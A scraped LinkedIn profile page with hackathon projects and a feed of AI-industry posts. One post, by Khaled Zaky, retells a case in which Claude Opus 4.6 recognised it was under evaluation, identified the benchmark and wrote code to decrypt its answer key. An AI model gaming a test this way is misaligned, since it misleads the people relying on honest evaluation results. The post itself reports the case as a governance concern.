Sign in to view Daniel B.’s full profile
or
New to LinkedIn? Join now
By clicking Continue to join or sign in, you agree to LinkedIn’s User Agreement, Privacy Policy, and Cookie Policy.
Sign in to view Daniel B.’s full profile
or
New to LinkedIn? Join now
By clicking Continue to join or sign in, you agree to LinkedIn’s User Agreement, Privacy Policy, and Cookie Policy.
San Francisco, California, United States
Sign in to view Daniel B.’s full profile
Daniel B. can introduce you to 10+ people at Figma
or
New to LinkedIn? Join now
By clicking Continue to join or sign in, you agree to LinkedIn’s User Agreement, Privacy Policy, and Cookie Policy.
579 followers
500+ connections
Sign in to view Daniel B.’s full profile
or
New to LinkedIn? Join now
By clicking Continue to join or sign in, you agree to LinkedIn’s User Agreement, Privacy Policy, and Cookie Policy.
View mutual connections with Daniel B.
Daniel B. can introduce you to 10+ people at Figma
or
New to LinkedIn? Join now
By clicking Continue to join or sign in, you agree to LinkedIn’s User Agreement, Privacy Policy, and Cookie Policy.
View mutual connections with Daniel B.
or
New to LinkedIn? Join now
By clicking Continue to join or sign in, you agree to LinkedIn’s User Agreement, Privacy Policy, and Cookie Policy.
Sign in to view Daniel B.’s full profile
or
New to LinkedIn? Join now
By clicking Continue to join or sign in, you agree to LinkedIn’s User Agreement, Privacy Policy, and Cookie Policy.
About
Welcome back
By clicking Continue to join or sign in, you agree to LinkedIn’s User Agreement, Privacy Policy, and Cookie Policy.
New to LinkedIn? Join now
Activity
579 followers
-
Daniel B. Chen liked thisDaniel B. Chen liked thisTime flies when you're having fun! ... which is my excuse for being a little late with this post. After nearly 3 years at Personio, I'm closing a chapter I'm genuinely grateful for. A lot of change, growth, and learning; but what I'll remember most is the people. I had the privilege of working with thoughtful, talented colleagues across engineering and leadership who cared deeply about craft, ownership, and doing the right thing, especially when things got complex. I'm proud of what we built together and of the foundations we helped put in place for what comes next. A sincere thank you to the leadership team and to everyone I had the chance to work with at Personio. You shaped me more than you know. --- I'm also excited to share that I've joined Samsara as a Principal Engineer. What drew me here is the chance to work on technology deeply connected to the physical world - where software, operations, and AI come together to create real, tangible impact at scale. That intersection feels especially meaningful right now, and I'm energized by what's ahead. Onward. 🚀 #NewChapter #Samsara #Personio
-
Daniel B. Chen liked thisDaniel B. Chen liked thisWe are hiring for a data scientist role to be part of our AI agent engineering team! Apply via job link below, or reach out if you want to chat or learn more.
-
Daniel B. Chen liked thisDaniel B. Chen liked thisThe Anduril mafia has raised more than $2 billion in total funding. We found the top 10 most funded ex-Anduril employees turned founders: 1. Base Power Company: Co-founded by Justin Lopas Funding Raised: $1.27B 2. Physical Intelligence: Co-founded by Adnan Esmail Funding Raised: $470M 3. Harbinger: Co-founded by John Henry Harris Funding Raised: $358M (Updated by Ben Dusastre, Harbinger CFO) 4. Nominal: Co-founded by Cameron McCord Funding Raised: $102M 5. The Lumber Manufactory: Co-founded by Michael G. Funding Raised: $52M 6. UNION: Co-founded by Sam Weintraub Funding Raised: $50M 7. Rune Technologies: Co-founded by David Tuttle, Peter Goldsborough Funding Raised: $30.2M 8. Shinkei: Co-founded by Reed Ginsberg Funding Raised: $30M 9. Vultron: Co-founded by Mac Liu Funding Raised: $26.8M 10. GenLogs: Co-founded by Joe Sherman Funding Raised: $21M Did we miss out on anyone?
-
Daniel B. Chen reacted on thisToday, I’m excited to announce Vultron's Series A, bringing our total funding to $22 million. The round was led by Greycroft, with participation from Craft Ventures, Long Journey, and South Park Commons. In 2024, Vultron came out of stealth to transform how federal contractors compete and win. Today, we’re trusted by some of the largest defense contractors and Fortune 500 enterprises. This is a clear signal that Vultron is redefining how companies operate and win in the federal market. I’m incredibly proud of our team and deeply grateful to our customers and partners for believing in what we’re building. We look forward to what is ahead in 2025. Read more: https://lnkd.in/g4Khab_P
-
Daniel B. Chen liked thisDaniel B. Chen liked thisAmazon is a unique tech company in many ways, but here's one of the weirdest: ~65% of its engineers are the same level. That level is SDE 2, which is mid-level. While SDE 1 -> SDE 2 is usually straightforward at Amazon, getting to senior (SDE 3) is stupidly hard. It's common for talented engineers to get stuck at this level for years, with a huge portion staying at SDE 2 for 5+ years. There are many Amazonians with ~10 years of experience who are leading entire teams but are somehow still classified as only mid-level. This is a huge reason behind Amazon's high attrition rate. Tons of SDE 2s get fed up and leave, landing senior/staff roles at comparable companies. To learn how about why this promotion is so difficult (and how to pull it off), check out our in-depth explainer from an Amazonian who actually made the SDE 2 -> SDE 3 jump here: https://lnkd.in/gAYKEjzk #techcareergrowth #softwareengineering #amazon #seniorengineer #promotion
-
Daniel B. Chen liked thisDaniel B. Chen liked thisSuper proud of the Figma #AI team shipping Figma Make today. This is a new tool to accelerate going from idea to product. Start with a design, image or prompt and get out a playable prototype you can refine, iterate on, or publish. The cost of learning just went down tremendously. Oh and you can use it with all your teammates, including live editing code together in the same space. Excited to see what people make! https://www.figma.com/make
-
Daniel B. Chen liked thisDaniel B. Chen liked this"I'm putting together a team" We're hiring at Cursor / Anysphere for product, ML, and pretty much everything else. Hit me up if you're interested and apply at https://anysphere.inc
Experience & Education
-
Figma
******** ********
-
******
*********** *******
-
***** ************* ****
*********** *******
-
********** ** ******** ******* ****
********** ****** ******** ******* *** ********* 4.0
-
-
********** ***** **** ******
-
-
View Daniel B.’s full experience
See their title, tenure and more.
Welcome back
By clicking Continue to join or sign in, you agree to LinkedIn’s User Agreement, Privacy Policy, and Cookie Policy.
New to LinkedIn? Join now
or
By clicking Continue to join or sign in, you agree to LinkedIn’s User Agreement, Privacy Policy, and Cookie Policy.
Projects
-
CSI: Clinical Search Index - HopHacks Spring 2016
Winner - MedImmune Prize: Develop a simple, user-friendly visualization tool for navigating biomedical data sets
CSI allows users to search for clinical trials they may be interested in based on properties such as disease, sponsor, and eligibility. It displays a heat map of the US which visualizes the number of ongoing trials that match the user's query in each state. We developed an algorithm that determines the credibility of sponsors and assigns each of them a ranking. Users can…Winner - MedImmune Prize: Develop a simple, user-friendly visualization tool for navigating biomedical data sets
CSI allows users to search for clinical trials they may be interested in based on properties such as disease, sponsor, and eligibility. It displays a heat map of the US which visualizes the number of ongoing trials that match the user's query in each state. We developed an algorithm that determines the credibility of sponsors and assigns each of them a ranking. Users can search for the clinical trials that best suit their needs by using a table that can be sorted based on sponsor ranking.Other creatorsSee project -
Goomba Squasher VR - Bitcamp 2015
Winner - 1st Prize Microsoft Product Hack
Goomba Squasher VR is a virtual reality Mario game built using the Microsoft Kinect and the Oculus Rift with the Unity Game Engine. It uses the Kinect to detect body movements and translates them into commands for the character in virtual reality.Other creatorsSee project -
Clusterfy - PennApps Winter 2015
Winner - Best Use of Spotify / Echo Nest APIs
- A web application that extracts music from a user’s Spotify playlists and performs k-means clustering to group songs based on fundamental properties such as key signature and tempo. It creates playlists based on these properties and inserts them into the user’s Spotify account.
- Clusterfy also provides a data visualization feature that allows the user to see how their music is related.Other creatorsSee project -
Tennis Predictor
See projectA web application that uses logarithmic regression to predict the outcome of tennis matches. Built
with Python’s scikit-learn library and Flask -
MyOwn Drums - YHack 2014
- Developed an Android application that interfaces with the Myo gesture control armband to simulate a virtual drumset
Other creatorsSee project -
Honeypot Project
-
- Created intentionally vulnerable containers in OpenVZ for use as high interaction honeypots on an Ubuntu VM
- Set up Snoopy Logger to log keystrokes of malicious intruders
- Designed cron jobs to perform routine maintenance, including resetting containers at certain intervals to kick off intruders and running data collection scripts
- Wrote bash scripts to process log files and transfer them remotely from Honeypot VM to a Data VM -
Autonomous Hovercraft Design
-
- Worked in a team of ten students to design, build, and test an autonomous hovercraft to navigate an obstacle course
- Designed circuits used to power hovercraft and programmed in Arduino language to control hovercraft
View Daniel B.’s full profile
-
See who you know in common
-
Get introduced
-
Contact Daniel B. directly
Other similar profiles
Explore more posts
-
Laurence Moroney
Arm • 135K followers
You spend months building the perfect PyTorch model. Then the real nightmare begins. Porting it. - One version for your flagship mobile app. - Another for that new wearable. - A third for the tiny IoT sensor. Each one needs different optimizations, different pipelines, different frameworks. It's a fragmented, time-sucking mess that kills your time-to-market. This is the single biggest bottleneck holding back true, at-scale edge AI. *Until now.* What if you could just... stop? What if you could use one unified workflow to deploy that one model across BILLIONS of devices? From ultra-efficient microcontrollers to flagship smartphones. From Arm Cortex-M CPUs to high-performance Ethos-U NPUs and Mali GPUs. *This isn't a "what if" anymore.* Meta and Arm just made it a practical reality. Introducing the ExecuTorch 1.0 GA (General Availability) release. This is the on-device runtime for PyTorch that developers have been waiting for. It's one toolset to rule them all. Developers can now author, export, optimize, quantize, and deploy using the same end-to-end PyTorch workflow. The best part? Your apps automatically benefit from performance and efficiency gains. Backend integrations with Arm KleidiAI, TOSA, and CMSIS-NN mean you get optimized performance "for free," with no need to modify your code. This is how we get the real promise of edge AI. Not just cloud-tethered apps, but... ➡️ Private, on-device assistants that run Llama 3. ➡️ Real-time audio generation (Stable Audio in <4 secs). ➡️ Smarter, power-efficient wearables. ➡️ Gaming experiences that adapt in real-time. Meta is already using this to power features for billions of users on Instagram, WhatsApp, and Facebook. Now, it's available to all developers. The fragmented, "port-it-again" days of edge AI are over. The "build-once, deploy-everywhere" era is here. Arm and Meta have dropped the full GA release, docs, tutorials, and pre-validated models. It's all in the blog post here: https://lnkd.in/ggj2rYCT I want to hear from the builders: - How will a single, unified PyTorch workflow change the way you develop for the edge? - What's the first on-device app you're excited to build with this? Drop your thoughts below 👇 and share this with every AI developer you know. This is a big one.
73
3 Comments -
Cherif YAYA
Pinterest • 1K followers
What I'm Reading This Week 📚 🚀 Kimi K2 : New Open Source AI's King Moonshot AI released Kimi K2, a 1-trillion parameter open-source model that rivals Claude Opus 4 at coding benchmarks while costing 100x less. Built with a new optimizer architecture and specifically designed for agentic capabilities, it scores well on SWE-bench tests. The pace of frontier-level innovation from Chinese AI labs is remarkable and worth watching closely. https://lnkd.in/gRiinJRW 🧠 Clear Thinking Frameworks Shane Parrish's "Clear Thinking" is a favorite of mine and offers actionable insights on decision-making frameworks, beautifully summarized in this piece. His concept of "position is everything" resonates deeply - choosing what gives you maximum optionality before decisions matter more than perfect decision-making in bad positions. I also recommend his Farnam Street newsletter for weekly mental models that actually stick. Poczwardowski article is a good summary introduction to the book. https://lnkd.in/gA9dbWGm ⚠️ The AI Productivity Reality Check METR's study found that experienced developers using AI tools actually work 19% slower, despite believing they're 20% faster. The culprit: time spent reviewing and correcting AI suggestions that are "directionally correct, but not exactly what's needed." This speaks to the Dunning-Kruger learning curve - like any tool, AI needs mastery to yield impressive results. The perception gap here is fascinating and probably applies beyond just coding. https://lnkd.in/gBY3KRW3 🪟 iPad Windows Growing Pains Craig Hockenberry's analysis of iPadOS 26's new window management reveals a fundamental tension between iOS's 18-year foreground/background model and Mac's 41-year windowing paradigm. Apps aren't syncing properly because Apple engineers are thinking iPhone-first rather than desktop-first. "iOS and iPadOS need that same clear distinction" between app-level and window-level activity states. I'm happy with the progress but these implementation details matter when you're building around the new capabilities. https://lnkd.in/guQszCyn ⚡ Concurrency vs Asynchrony Demystified Loris Cro's deep dive clarifies that asynchrony (tasks running out of order) differs from concurrency (multiple tasks progressing simultaneously). This led me down a rabbit hole learning about Zig, a language with strong opinions about memory management and remarkably clean async/await design. Understanding these distinctions helps me think more clearly about why certain patterns emerge in different contexts. https://lnkd.in/gmtcx8yK #AI #OpenSource #DecisionMaking #Productivity #TechTrends #SoftwareDevelopment #iPadOS
9
-
Snir Ben Shimol
ZEST Security • 8K followers
Resourcely (acquired by Anysphere) was acquired by Anysphere, the team behind Cursor. This signals a major technical shift that’s brewing in cloud security and AI-native infrastructure. + Anysphere, like any company building deeply integrated AI agents, needs to secure a dynamic, ephemeral, and rapidly scaling cloud surface. Traditional CNAPP and CSPM tools weren’t built for that. + This is about context-aware, AI-native remediation at scale, where the fix isn’t a Jira ticket, but a simulated change with maximum risk reduction. + This acquisition validates the need for automated remediation that goes deeper than prioritization - remediating at the IaC level, through launch templates, configurations, and base images. This bold innovative move reaffirms ZEST Security vision and what many of us have been building toward -Remediation is no longer a human follow-up task- Congrats to the amazing Resourcely team 🥳 and especially Travis McPeak one of the best advisors who I really enjoyed working with at Cider Security (acquired by Palo Alto Networks) #AIforSecurity #CloudRemediation #VulnerabilityManagement #SecureByDesign
29
-
Roshan Venugopal
Optum • 4K followers
Mitchell Hashimoto is the founder of Hashicorp and has built some impressive products like Vagrant, Terraform etc. now he is building Ghostty, a new terminal emulator. In this below blog he describes how he uses AI Agents to build complex features to Ghostty. Great example of a 10x programmer using AI coding agents, as an assistant.
14
-
Addy Osmani
Google • 259K followers
Tip: Solve memory issues slowing your site with AI + Chrome DevTools 1. Go to Chrome DevTools 2. In the Memory panel, record a heap snapshot and save it 3. Drop it into your favorite AI coding tool - Cursor, Claude Code, Antigravity. Your agent can write Python scripts to analyze the snapshot and point out what's making your website feel sluggish. It can also try fixing them. You can also take a snapshot before your website starts slowing down and one after for your agent to compare before v.s. after fixes are made. Tips via shaoruu who works on Cursor. #ai #programming #softwareengineering
865
40 Comments -
Manish Jain
Firstsource • 11K followers
If you're running LLMs locally and constantly hitting OOM errors, the KV cache is probably your bottleneck and 𝗞𝗜𝗩𝗜 has a fix that works. The problem: KV cache eats memory fast. Llama-2-7B with 32K context needs 4GB just for the cache before model weights. Multiply across users and you're done. 𝗞𝗜𝗩𝗜 compresses KV cache to 2 bits with minimal quality loss using asymmetric quantization per-channel for Keys (handles outliers), per-token for Values (isolates errors). Keeps recent tokens in FP16, compresses older ones. Results: 4x memory reduction = 4x more users on same hardware. Plug-and-play with Hugging Face, no retraining needed. Modern inference is memory-bandwidth bound, not compute-bound. This shifts the bottleneck back to where GPUs excel. Full breakdown: https://lnkd.in/gkaQbmfn #LLMs #MLOps #AIInfrastructure #MachineLearning #KIVI
27
-
Gaurav Nukala
Notable Systems • 6K followers
As frontier model context windows hit 1M tokens, it’s tempting to dump everything—tools, docs, instructions—into a prompt and let the model sort it out. "Lost in the middle" is real — research shows models perform best when relevant info is at the start or end of the input, and degrade when it’s buried in the middle, even for long-context models. That’s where context engineering comes in: writing, selecting, compressing, and isolating context for accuracy and efficiency. Three evolving approaches for optimizing context: 1️⃣ Scratchpad – Store info outside the active context window (e.g., Anthropic’s Think tool) so agents can pause mid-response, reflect, and refine. 2️⃣ Context isolation – Give each sub-agent only what it needs for its task. Anthropic’s multi-agent system does this, with a lead agent merging results for accuracy. 3️⃣ Prompt caching – Cache shared instructions or background once (e.g., Anthropic’s Prompt Caching) and send only new input each time to cut cost and latency.
26
-
Dmitry Vostokov 🇮🇪
Oracle • 20K followers
Since 2007, when I wrote about threads as braided strings in abstract space, many trace and log analysis patterns use geometric and topological metaphors (https://lnkd.in/eWEA-9mP). I've asked GPT-5 to think about the geometry of traces and logs, and it produced: a Geometric Theory of Traces and Logs (GTTL) as an extension of the Pattern-Oriented Diagnostics (POD) framework. While traditional trace and log analysis treats recorded system events as discrete time-ordered sequences, GTTL interprets them as geometric trajectories through a multi-dimensional configuration space. Each event is a point, each trace is a curve, and each log corpus forms a stratified manifold of trajectories. Patterns correspond to geometric invariants — stable features under transformations such as projection, adjunction, and deformation. The resulting formalism unifies trace semantics, pattern taxonomy, and diagnostic reasoning through topology, differential geometry, and category theory. It offers new metrics of similarity, curvature, and continuity, enabling quantitative characterization of anomalies and pattern recognition in large-scale distributed systems and AI processes. Conversation: https://lnkd.in/ew6T6CKU Document: https://lnkd.in/ekhyUugN
37
2 Comments -
Anyscale
59K followers
We are seeing an emerging 3-layer OSS stack for AI compute: 🔧 PyTorch + 🧠 vLLM + ⚡ Ray + 📦 Kubernetes 🎥 Robert Nishihara gives a quick breakdown of how this stack works together to scale LLMs + GenAI workloads The AI compute software stack consists of 3 specialized layers: 🔧 Layer 1: Training & Inference Framework (PyTorch + vLLM) • Runs models efficiently on GPUs • Handles model optimization and model parallelism strategies • Manages accelerator memory and automatic differentiation ⚡Layer 2: Distributed Compute Engine (Ray) • Schedules tasks within jobs and coordinates processes • Ingests and moves data • Provides workload-aware failure handling and autoscaling 📦 Layer 3: Container Orchestrator (Kubernetes) • Provisions compute resources • Schedules entire jobs • Manages user and workload multitenancy Each layer handles what it does best. The separation of concerns makes this stack so powerful. 📖 Read the full blog post with examples from Pinterest, Uber, and Roblox: https://lnkd.in/eyn3jBfU
155
5 Comments -
Khaled Zaky
RBC Borealis • 5K followers
Anthropic shared a wild case study on Claude Opus 4.6. When the model hit a wall during a websearch test, it didn't just fail as it correctly hypothesized it was being evaluated, identified the specific benchmark, and then wrote its own code to find and decrypt the answer key 🤯 As I’ve written recently on my blog, the shift from "software that executes" to "agents that act" changes everything. This is a perfect example of why governance is an architectural problem, not a compliance one. When an agent is smart enough to "hack the test" to achieve its goal, traditional static gates and simple prompts aren't enough. We need a true platform mindset…one built for autonomous actors that can recognize the boundaries of their sandbox and actively look for a way out….If you’re still treating AI as a deterministic tool, it’s time to rethink your stack The full deep dive from Anthropic is worth a read: https://lnkd.in/gPXdffpy
88
5 Comments -
Hamza Farooq
traversaal.ai • 40K followers
💡With so many new Open Source LLMs in the market, it’s time for us to learn how to run them locally Scenario: You want to try running a GLM 4.6 locally and test it out - but you don't have the hardware for it! Deploying large language models (LLMs) isn't just about running them — it’s about making sure they work well, even when resources are limited. As models move to edge devices or serverless environments, here’s the real question: How can we scale LLMs without depending on OpenAI or Anthropic? 🔹 Smaller hardware: Not everyone has a massive compute setup. 🔹 Performance: We need LLMs that run fast but don’t eat up all the power. 🔹 Scalability: How can we make sure these models scale without losing quality? This is where things like quantization and frameworks like GPTQ, AWQ, and GGUF come in — they make models smaller, faster, and more efficient, all open source. If you're curious to dive deeper into these concepts and how to apply them, check out my course on Maven, Agent Engineering Bootcamp: Developers Edition, where we explore these techniques in detail. Next cohort starts on Nov 1, 2025. Course link: https://bit.ly/47rGy7g
86
4 Comments -
Hrittik Roy
vCluster • 12K followers
⚙️ 𝗚𝗣𝗨𝘀 𝗮𝗿𝗲𝗻’𝘁 𝘁𝗵𝗲 𝗯𝗼𝘁𝘁𝗹𝗲𝗻𝗲𝗰𝗸. 𝗜𝗻𝗳𝗿𝗮𝘀𝘁𝗿𝘂𝗰𝘁𝘂𝗿𝗲 𝗱𝗲𝘀𝗶𝗴𝗻 𝗶𝘀 A lot of teams running shared GPU clusters are hitting the same wall. Not because they can’t get GPUs, but because 𝘀𝗰𝗮𝗹𝗶𝗻𝗴 𝗔𝗜 𝘄𝗼𝗿𝗸𝗹𝗼𝗮𝗱𝘀 𝗼𝗻 𝗯𝗮𝗿𝗲 𝗺𝗲𝘁𝗮𝗹 𝗶𝘀 𝗵𝗮𝗿𝗱. The real pain shows up as: • Unfair GPU allocation across teams • Weak isolation between workloads • Manual, ticket-driven environment setup • Expensive GPUs sitting idle As AI and ML workloads move from experiments to production systems, these problems get amplified on bare-metal GPU infrastructure. Recently, I worked on this 𝘂𝗻𝗴𝗮𝘁𝗲𝗱 𝗴𝘂𝗶𝗱𝗲 that breaks down how to build a 𝗰𝗹𝗼𝘂𝗱-𝗹𝗶𝗸𝗲 𝗱𝗲𝘃𝗲𝗹𝗼𝗽𝗲𝗿 𝗲𝘅𝗽𝗲𝗿𝗶𝗲𝗻𝗰𝗲 on bare metal GPUs using vCluster It covers how to enable: ✨ Strong multi-tenancy and isolation ✨ Self-service environments for ML teams ✨ Faster onboarding without central bottlenecks ✨ Higher GPU utilization with lower operational overhead If you’re operating shared GPU infrastructure and want it to behave more like an internal cloud platform, this should be useful 👇 🔗 https://lnkd.in/e7aDZ4vQ
222
2 Comments -
Furu Wei
Microsoft Research Asia • 12K followers
“There's Plenty of Room at the Bottom – By Richard Feynman” Introducing BitNet v2, the first native 4-bit activation for 1-bit LLMs (and for any LLMs). It represents a significant technical advancement in 1-bit LLMs, following the introduction of BitNet v1 in October 2023 and BitNet b1.58 in February 2024. Activation outliers present significant challenges to LLM efficiency for low-bit LLMs, particularly in cloud and batch environments. We tackled this issue by proposing an online Hadamard transformation before activation quantization. This technique smooths sharp distributions into more Gaussian-like forms, making them amenable to low-bit representation. Experimental results demonstrate that BitNet v2 trained from scratch achieves performance comparable to BitNet b1.58 at 8-bit activations. More importantly, training with native 4-bit activations yields minimal performance loss, offering substantial reductions in memory footprint and computational cost for batched inference. BitNet v2 is a local optimum for low-bit LLMs – 1.58-bit model weights and 4-bit activations. Following the introduction of BitNet b1.58 2B4T, we anticipate the development of more and larger native 1-bit LLMs. To truly revolutionize AI efficiency, we reiterate our call for custom systems and hardware specifically optimized for these models, advocating for the co-design and co-evolution of model architecture, systems, and hardware. To conclude, echoing Richard Feynman's famous and profound quote "There's Plenty of Room at the Bottom," which envisioned a future of manipulating matter at incredibly small scales, a similar principle may hold true as well for 1-bit LLMs. https://lnkd.in/gy59Wtrd
178
3 Comments -
Pragyan Tripathi
Amperity • 4K followers
Claude just published a fascinating technical postmortem that's worth reading if you work with LLMs. Between August and September, three infrastructure bugs were quietly degrading responses. Users started getting random Thai characters mixed into English text. Some requests got routed to servers configured for 1M token contexts when they only needed short ones. Token generation occasionally just... corrupted. The interesting part? Their internal evaluations didn't catch any of it. Here's what happened: → 30% of Claude Code users experienced some degraded responses → At peak, 16% of Sonnet requests were hitting wrong servers→ Some users saw "สวัสดี" randomly appear in English responses → "Sticky routing" meant if you hit a bad server once, you'd keep hitting it The bugs were caught through user reports, not monitoring. Even with world-class ML infrastructure, the complexity of serving models across multiple hardware platforms (Trainium, GPUs, TPUs) created failure modes their benchmarks couldn't detect. What struck me: this isn't really about preventing LLM errors - they're inevitable in complex distributed systems. It's about detection and resolution speed. Some thoughts on LLM reliability: 🔍 Traditional uptime monitoring isn't enough. You need to monitor for "weirdness" - outputs that are technically valid but qualitatively wrong. Think semantic drift, not just HTTP 500s. 👥 User feedback becomes critical infrastructure. Your users often detect issues before your dashboards do. Make reporting easy and act on patterns quickly. ⚡ Consider graceful degradation strategies. Maybe that's fallback models, retry logic with different endpoints, or even hybrid approaches that validate outputs before returning them. The transparency here is refreshing. More companies should share these kinds of deep dives - we all benefit from understanding real-world failure modes. Anyone building LLM applications has stories like this. What's your approach to monitoring model behavior in production?
14
1 Comment -
TensorWave
12K followers
Closed stacks may feel convenient, until something breaks. Then you inherit opacity, vendor lock-in, and limited recourse. At scale, open source with Pytorch delivers reproducibility, transparent debugging, and true workload portability as requirements evolve. Open source isn’t ideology. it’s risk mitigation for training infrastructure. Read more:https://lnkd.in/eyFxraSY
19
-
Akhilesh Gupta A
Altir • 8K followers
I wanted to test Claude Opus 4.5 vs Gemini 3 on design, and this video is how it turned out. Summary: 🚀 Claude Opus 4.5 First model to cross 80% on SWE-bench Verified, massive 67% price cut, new Effort Parameter, and truly production-grade tool use. A beast for backend + complex refactoring. 🎨 Gemini 3 1M token context window, elite reasoning scores (91.9% GPQA Diamond), and genuinely impressive frontend generation. The best model today for creative + UI-heavy work. 🖼️ Nano Banana Pro Google finally cracked consistent text-in-image! 4K output, multi-reference support, and seamless Workspace integration. Perfect for infographics, portfolios, and marketing visuals. 🛠️ Antigravity IDE Ambitious multi-agent coding vision, but still too buggy. Great ideas, needs maturity. If you want to check out the design I shared visit: https://lnkd.in/gFAsXnYs If you want to get the prompt to build one and learn about Claude Opus 4.5 & Gemini 3 , read my article here : https://lnkd.in/gk67nSv2
35
Explore top content on LinkedIn
Find curated posts and insights for relevant topics all in one place.
View top content